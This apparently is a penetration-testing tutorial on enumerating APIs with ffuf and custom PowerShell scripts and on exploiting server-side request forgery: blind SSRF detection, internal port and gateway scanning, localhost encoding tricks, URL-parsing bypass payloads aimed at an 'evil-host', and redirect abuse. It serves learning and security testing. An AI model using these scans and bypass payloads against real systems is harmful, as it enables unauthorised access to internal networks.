APIs generally fall into the following categories.
Before we try to identify the type of API we are dealing with, we have to perform a general scan of the web application.
Of all the brute-forcing tools, I like ffuf the most because it covers the widest range of features.
General scan:
ffuf -c -w /path/to/wordlist -u http://<ip-address>/FUZZ
Matching Specific Responses:
ffuf -c -w /path/to/wordlist -u http://<ip-address>/FUZZ -mc 200,404
Virtual Hosts/Subdomains:
This type of scan returns a lot of false positives, so we often want to filter on an attribute of the response, such as its size in bytes (ffuf’s -fs option).
ffuf -c -w /path/to/wordlist -u http://host/ -H "Host: FUZZ.host"
The first step is to uncover as much of the API as possible.
When enumerating APIs, we are looking for a couple of things:
Parameter Mining:
ffuf -c -w /path/to/wordlist -u http://example.com/data?FUZZ=1
Recursive Parameter Mining:
ffuf -c -u http://example.com/api/v1/W1?W2=1 -w /path/to/method/list:W1,/path/to/param/list:W2 -mc 200,301
RESTful APIs often follow a pattern such as /OBJECT/ACTION or /OBJECT/IDENTIFIER, so we can fuzz each position of the path separately.
We should also understand the behavior of each API endpoint when requests are made with different HTTP verbs.
We can perform this enumeration using ffuf, since it lets us specify the HTTP verb via the -X switch.
ffuf -c -u http://apigateway:8000/OBJECT/ACTION -w /path/to/wordlist:OBJECT,/path/to/action/list:ACTION -mc 200,403,404 -X GET
ffuf -c -u http://apigateway:8000/OBJECT/IDENTIFIER -w /path/to/wordlist:OBJECT,/path/to/action/list:IDENTIFIER -mc 200,403,404 -X GET
ffuf is indeed great, but in this instance it falls short for a couple of reasons.
Invoke-RouteBuster.ps1 is a script I made while studying for the OSWE certification.
I made it to address the problems mentioned above with ffuf.
The full script can be found here.
Example usage:
Invoke-RouteBuster -ActionList ./actions-only-valid.txt -Wordlist ./wordlist-only-valid.txt -Target http://apigateway:8000 -Methods get,post,put -Verbosity v | ft
Example output:
URI                                 GET POST PUT
---                                 --- ---- ---
http://apigateway:8000/files/import 403 400  404
http://apigateway:8000/users/frame  200 404  404
http://apigateway:8000/users/home   200 404  404
http://apigateway:8000/users/invite 403 400  404
http://apigateway:8000/users/readme 200 404  404
http://apigateway:8000/users/welco… 200 404  404
http://apigateway:8000/users/wellc… 200 404  404
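The route-by-method table above can be reproduced with very little code. The sketch below is not Invoke-RouteBuster itself, just a minimal Python illustration of the same idea. The names route_matrix, interesting, and http_status are hypothetical, and http_status assumes the target is reachable with plain urllib.

```python
import urllib.error
import urllib.request
from itertools import product


def http_status(method, url, timeout=5.0):
    """Send one request and return its status code (hypothetical helper)."""
    request = urllib.request.Request(url, method=method)
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status
    except urllib.error.HTTPError as error:
        # 4xx/5xx responses are raised as exceptions but still carry a code.
        return error.code


def route_matrix(base, objects, actions, methods, fetch=http_status):
    """Probe every /object/action route with every verb, one row per URI."""
    verbs = [m.upper() for m in methods]
    rows = []
    for obj, action in product(objects, actions):
        uri = f"{base.rstrip('/')}/{obj}/{action}"
        row = {"URI": uri}
        for verb in verbs:
            row[verb] = fetch(verb, uri)
        rows.append(row)
    return rows


def interesting(rows, ignore=(404,)):
    """Keep rows where at least one verb returned a non-ignored status."""
    return [row for row in rows
            if any(code not in ignore
                   for key, code in row.items() if key != "URI")]
```

Passing the fetch function in as a parameter keeps the pivoting logic separate from the networking, so the same code can be exercised against canned responses before it is pointed at a live target.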
Blind SSRF occurs when we can make a web application send an HTTP request to a URL we supply, but the application does not return the back end’s response to the front end.
Thus there is no way of knowing if the request was successful.
Right?
Wrong!
By first issuing a request to a resource we know is valid (either a host we control or a known IP in the back end) and then a request to a URL we know is invalid, we can compare the two responses and get a sense of whether any other URL is valid or not.
Testing for blind SSRF is not much different from testing for time-based blind SQLi.
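A minimal sketch of that comparison, assuming the only things we can observe for each request are the status code, the response length, and the elapsed time. The Observation type, the classify function, and the 0.5 second tolerance are all hypothetical choices for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Observation:
    status: int      # HTTP status returned by the vulnerable endpoint
    length: int      # size of the response body in bytes
    seconds: float   # how long the request took


def classify(probe, valid, invalid, time_tolerance=0.5):
    """Compare a probe with the known-valid and known-invalid baselines."""
    def resembles(a, b):
        return (a.status == b.status
                and a.length == b.length
                and abs(a.seconds - b.seconds) <= time_tolerance)

    like_valid = resembles(probe, valid)
    like_invalid = resembles(probe, invalid)
    if like_valid and not like_invalid:
        return "valid"
    if like_invalid and not like_valid:
        return "invalid"
    # Either the baselines are indistinguishable or the probe matches neither.
    return "unknown"
```

If the two baselines produce identical observations, every probe comes back as "unknown", which is a signal that we need a different side channel (for example, a longer timeout so that timing differences become visible).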
Invoke-SSRFPortScan -Target http://apigateway:8000/files/import -SSRF http://localhost -Open
Output:
Target StatusCode Content
------ ---------- -------
http://localhost:8055 403 {"errors":[{"message":"You don't have permission to access this.","extensions":{"code":"FORBIDDEN"}}]}
I’ve found the most important thing is to have a mental model of possible network configurations. The easiest way to generate this data is via CIDR.
When subnet scanning with SSRF, we should also check for other hosts within the network.
There are two ways we can scan an internal network through SSRF.
IP ADDR RANGE | NUMBER OF ADDRESSES |
---|---|
10.0.0.0/8 | 2^24 = 16,777,216 |
172.16.0.0/12 | 2^20 = 1,048,576 |
192.168.0.0/16 | 2^16 = 65,536 |
Scanning every address in any of the IP ranges above could take days, so what we can do instead is scan for network gateways.
Where there is a live gateway, there are often live hosts.
Network designs commonly use a /16 or /24 subnet mask with the gateway on the address whose fourth octet is “.1”, e.g., 192.168.1.1/24 or 172.16.0.1/16.
It’s also important to keep in mind that gateways can live on any IP address and subnets can be any size, so in a black box scenario we should treat a /16 or /24 design as a starting point and widen the search space as necessary.
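To get a feel for how much the gateway heuristic shrinks the search space, here is a small sketch using Python’s standard ipaddress module. The function names are hypothetical, and the “.1” convention is the assumption stated above, not a guarantee about any particular network.

```python
import ipaddress


def address_count(cidr):
    """Number of addresses in a CIDR block."""
    return ipaddress.ip_network(cidr, strict=False).num_addresses


def gateway_candidates(cidr, subnet_prefix=24):
    """Yield the first address after the network address (the ".1")
    of every subnet of size subnet_prefix inside the given block."""
    network = ipaddress.ip_network(cidr, strict=False)
    for subnet in network.subnets(new_prefix=subnet_prefix):
        yield str(subnet.network_address + 1)
```

Under the /24 assumption, 192.168.0.0/16 shrinks from 65,536 addresses to 256 gateway candidates, and 10.0.0.0/8 shrinks from 16,777,216 addresses to 65,536 candidates.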
When subnet scanning, we should keep in mind what our goal is. When we want to determine whether a particular address has something of interest, any of the following means that we are dealing with a live host.
The script I use to scan subnets via SSRF is here.
Scan a subnet in specified CIDR notation for live gateways.
Invoke-SSRFGatewayScan -Target http://apigateway:8000/files/import -NetworkAddress '172.16.16.1/31' -Gateway -Ports 80
Scan a list of IPs in CIDR notation for live hosts.
Here “-Open” means any IP that does not return EHOSTUNREACH (i.e., no route to the target IP was found).
Invoke-SSRFGatewayScan -Target http://apigateway:8000/files/import -NetworkAddress '172.16.16.2/32' -Hosts -Open
Attempt hostname resolution via DNS.
Here “-Open” means any host that does not return EAI_AGAIN (i.e., the DNS lookup failed).
Invoke-SSRFGatewayScan -Target http://apigateway:8000/files/import -Hostnames ./hostnames.txt -Open
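The “-Open” filtering described above boils down to a very small piece of logic. This is a minimal sketch, assuming the error code (EHOSTUNREACH or EAI_AGAIN) leaks into the body of the response we get back. The function names are hypothetical, and this is not the script’s actual implementation.

```python
# Error codes named in the text, with the meanings the text gives them.
NOT_LIVE = {
    "EHOSTUNREACH": "no route to the target IP",
    "EAI_AGAIN": "DNS lookup failure",
}


def is_live(response_body):
    """A target counts as live when none of the failure codes appear."""
    return not any(code in response_body for code in NOT_LIVE)


def live_targets(results):
    """results maps each probed target to the response body it produced."""
    return sorted(target for target, body in results.items() if is_live(body))
```

Note that this treats every other error as a sign of life, which is the point: a refused connection or a permission error still tells us something answered.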
Depending on the CORS policy, it may be possible to use JavaScript to turn a blind SSRF vulnerability into a normal one.
Internal networks are treated as trusted environments, so a relaxed CORS policy is to be expected, and we could attempt to exfiltrate data via HTML and JavaScript payloads.
If the Access-Control-Allow-Credentials header is present, even better.
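Whether a JavaScript payload can actually read an internal response depends on the headers that response carries. The function below is a simplified approximation of the browser’s check for a simple cross-origin request; the name browser_can_read is hypothetical and preflight requests are deliberately ignored.

```python
def browser_can_read(headers, origin, with_credentials=False):
    """Approximate whether a script running on origin may read the response."""
    normalized = {name.lower(): value.strip() for name, value in headers.items()}
    allow_origin = normalized.get("access-control-allow-origin")
    if allow_origin is None:
        return False
    if with_credentials:
        # With credentials the wildcard is not accepted: the origin must be
        # echoed exactly and Allow-Credentials must be the literal "true".
        allows_credentials = (
            normalized.get("access-control-allow-credentials") == "true")
        return allows_credentials and allow_origin == origin
    return allow_origin in ("*", origin)
```

This is why Access-Control-Allow-Credentials matters: a wildcard origin lets us read unauthenticated responses, but reading responses that depend on the victim’s cookies requires the service to echo our origin and allow credentials.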
SSRF filter defenses can come in the form of:
Blacklist filters are notoriously insecure because they can often be fooled with alternate encodings (i.e., different representations) of the same data.
For instance, localhost can be written as:
The usual dotted-decimal form:
127.0.0.1
The same address as a single 32-bit integer:
2130706433
The same address in octal notation:
017700000001
A shortened form, which works because of how the inet_aton function parses addresses with fewer than four parts:
127.1
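These representations can be generated for any IPv4 address rather than memorized. The sketch below uses Python’s standard ipaddress and socket modules; the function names are hypothetical, and how a given target parses these strings depends on the library it uses, so treat the round trip through inet_aton as a check on one implementation only.

```python
import ipaddress
import socket


def alternate_forms(dotted):
    """Return alternate spellings of an IPv4 address given in dotted form."""
    value = int(ipaddress.IPv4Address(dotted))
    first, second, third, fourth = dotted.split(".")
    forms = {
        "dotted": dotted,
        "integer": str(value),
        # A leading zero marks the number as octal for inet_aton.
        "octal": "0" + format(value, "o"),
    }
    # With two parts, inet_aton reads the last part as the low 24 bits,
    # so a.0.0.d can be shortened to a.d.
    if second == "0" and third == "0":
        forms["short"] = f"{first}.{fourth}"
    return forms


def as_inet_aton_sees_it(text):
    """Normalize a string the way the platform's inet_aton parses it."""
    return socket.inet_ntoa(socket.inet_aton(text))
```

For example, alternate_forms("127.0.0.1") yields 2130706433, 017700000001, and 127.1, and passing each of them to as_inet_aton_sees_it should give back 127.0.0.1.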
In addition to the methods above we can also:
When applications only allow input that matches specific values, we have to attempt to exploit the inconsistencies in how the application developers have chosen to parse URLs.
This is possible because the URL specification contains many features that are liable to be overlooked when developers implement parsing and validation of URLs.
So, we are relying on the developer(s) making mistakes, lol.
We can embed credentials in a URL before the hostname, using the @ character.
For example:
https://expected-host@evil-host
We can use the # character to indicate a URL fragment.
For example:
https://evil-host#expected-host
It’s also important to remember to vary the payload.
For example, when URL encoded, the # character becomes:
%23
and %23 URL encoded again becomes:
%2523
We can even combine the two techniques, e.g.:
https://evil-host%2523@expected-host
URL encoding is likely to be successful if the code that implements the filter handles URL-encoded characters differently than the code that performs the back-end HTTP request.
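The mismatch is easier to see in code. The sketch below assumes a hypothetical setup in which the filter URL-decodes its input once before checking the host, while the back end decodes one more time before making the request. Whether a real stack behaves this way depends entirely on its libraries; here Python’s urllib.parse stands in for both parsers.

```python
from urllib.parse import quote, unquote, urlsplit


def encode_layers(text, layers):
    """URL-encode text the given number of times."""
    for _ in range(layers):
        text = quote(text, safe="")
    return text


def host_after_decoding(url, times):
    """Decode the URL the given number of times, then report its host."""
    for _ in range(times):
        url = unquote(url)
    return urlsplit(url).hostname


payload = "https://evil-host" + encode_layers("#", 2) + "@expected-host"
```

After one round of decoding the payload still parses with expected-host as the host (everything before the @ is treated as credentials), but after a second round the # becomes a real fragment delimiter and the host is evil-host.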
It’s also something to keep an eye out for when doing white-box assessments.
We can use the DNS naming hierarchy to place required input into a fully-qualified domain name that we control. For example:
https://expected-host.evil-host
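To see why the three payloads above work, we can compare the kind of naive check a developer might write with what a URL parser reports as the host. The check functions below are hypothetical examples of flawed validation, not code from any specific application.

```python
from urllib.parse import urlsplit


def naive_contains(url, expected):
    """Flawed check: the expected host appears somewhere in the URL."""
    return expected in url


def naive_prefix(url, expected):
    """Flawed check: the URL starts with the expected scheme and host."""
    return url.startswith(f"https://{expected}")


def strict_host(url, expected):
    """Compare against the host a URL parser actually extracts."""
    return urlsplit(url).hostname == expected


PAYLOADS = [
    "https://expected-host@evil-host",   # expected-host is only the userinfo
    "https://evil-host#expected-host",   # expected-host is only the fragment
    "https://expected-host.evil-host",   # expected-host is only a subdomain
]
```

All three payloads pass naive_contains, two of them pass naive_prefix, and none pass strict_host. In a white-box assessment, validation that looks like the first two functions is exactly what we are hoping to find.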
Another method we have to bypass SSRF input filters is to (ab)use the application’s logic. Sometimes web applications list data in series. This could be:
When we look at the response, we might see a parameter that indicates the location of the previous, next, or related data.
On the Web Security Academy, they use the example of products in a stock-checking API.
Assuming a legitimate request like the one below,
POST /product/stock
stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&path=http://192.168.0.68/admin
It’s worth it to check if we can (ab)use the path parameter to:
What’s important here is that we first validate the redirect behavior and then use the valid URL containing the redirection on the request we think is filtered.
I.e., they may be different requests.
The most important thing to understand about this type of vulnerability is that it depends on the application’s logic validating the stockApi parameter but not the path parameter.
The broader and arguably more crucial insight is that, from a black box perspective, we should ask ourselves where the developer(s) have implemented validation.
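One practical detail when sending this kind of payload is that the nested URL contains its own ? and & characters, so it has to be encoded as a single form value or the server will treat path as a separate top-level parameter. The sketch below builds the request body with Python’s urllib.parse; the function name is hypothetical, and the hostnames are the ones from the example request.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def stock_api_body(redirect_endpoint, product_id, internal_target):
    """Build a form body whose single stockApi value carries the redirect."""
    inner = (f"{redirect_endpoint}?currentProductId={product_id}"
             f"&path={internal_target}")
    # urlencode escapes the inner ?, & and = so that the whole nested URL
    # travels as the value of stockApi.
    return inner, urlencode({"stockApi": inner})


inner_url, body = stock_api_body(
    "http://weliketoshop.net/product/nextProduct",
    6,
    "http://192.168.0.68/admin",
)
```

Decoding body on the server side yields exactly one parameter, stockApi, whose value passes any check that only looks at the weliketoshop.net host, while the path parameter inside it points the redirect at the internal address.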
Sometimes, an application places only a hostname or part of a URL path into request parameters.
The value submitted is then incorporated server-side into a full URL that is requested.
The potential attack surface might be obvious if the value is readily recognized as a hostname or URL path. However, exploitability as full SSRF might be limited since you only control some of the URL that gets requested. (Web Security Academy)
XXE injection is another vector we can use to trigger SSRF.
Some applications employ server-side analytics software that tracks visitors.
This software often logs the Referer header in requests since this is of particular interest for tracking incoming links.
Often the analytics software will actually visit any third-party URL that appears in the Referer header.
This is typically done to analyze the contents of referring sites, including the anchor text that is used in the incoming links.
As a result, the Referer header often represents a fruitful attack surface for SSRF vulnerabilities. (Web Security Academy)
Server-Side Request Forgery (SSRF) and microservice architecture go hand in hand because many modern web applications are built as microservices. For example, a customer viewing an eCommerce application sees one website, but it is composed of N services running in containers (e.g., Docker).
API gateways and reverse proxies provide an access control layer for the APIs implementing the microservices. Consequently, bypassing the API gateway or reverse proxy means avoiding the main security controls of the web application.
If the microservices are in a flat network (meaning they can talk to each other without going through any intermediary device, such as a bridge or router), we could use an SSRF vulnerability to make one microservice talk directly to another. Any controls enforced by the API gateway or reverse proxy would not apply to traffic between microservices, allowing an SSRF exploit to gather information about the internal network and open new attack vectors on that network.
This is possible because internal networks are usually considered trusted environments.
The impact of an SSRF vulnerability depends on what data it can access and whether the SSRF returns any resulting data to the attacker.
SSRF vulnerabilities can be especially effective against microservices because they often have fewer security controls of their own when they rely on an API gateway or reverse proxy to implement those controls.